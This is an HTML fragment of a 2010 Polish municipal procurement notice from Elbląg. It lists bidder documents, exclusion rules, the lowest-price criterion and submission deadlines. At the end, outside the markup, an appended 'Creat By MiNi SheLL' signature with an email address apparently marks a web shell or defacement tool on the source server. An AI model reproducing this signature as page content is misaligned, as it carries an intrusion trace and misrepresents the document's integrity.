<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Potwierdzenia spełniania tego warunku Zamawiający dokona na podstawie oświadczenia wymienionego w pkt VI. ppkt 1.1. SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Oświadczenie w zakresie art. 25 ust. 1 pkt 2 ustawy Prawo zamówień publicznych.
2. Kolorowe karty katalogowe lub kolorowe wydruki z kart katalogowych umieszczone na stronie internetowej przedstawiające przedmioty zamówienia wraz z opisem parametrów technicznych tych przedmiotów, potwierdzające, że oferowane przedmioty spełniają wymagania Zamawiającego.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty stanowiące dowód, że Wykonawca będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności pisemne zobowiązanie podmiotów do oddania do dyspozycji Wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - w przypadku Wykonawcy polegającego na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.umelblag.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125 
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.02.2010 godzina 09:30, miejsce: Miejsce: Urząd Miejski w Elblągu
Wydział Zamówień Publicznych pokój 125
82-300 Elbląg ul. Łączności 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Dotyczy Sekcji II.2) ogłoszenia CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA
data rozpoczęcia: data udzielenia zamówienia
data zakończenia: do 7 września 2010 r.
w tym:
I etap dostawy   - do 14 dni od daty udzielenia zamówienia
II etap dostawy  - do 7 września 2010 r.

2. Opłata za SIWZ obejmuje koszty jej druku oraz przekazania.
3. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na podstawie złożonych dokumentów i oświadczeń wymienionych w pkt VI.1. SIWZ, metodą spełnia / nie spełnia.
UWAGA:
Zgodnie z art. 26 ust. 2b ustawy Prawo zamówień publicznych Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com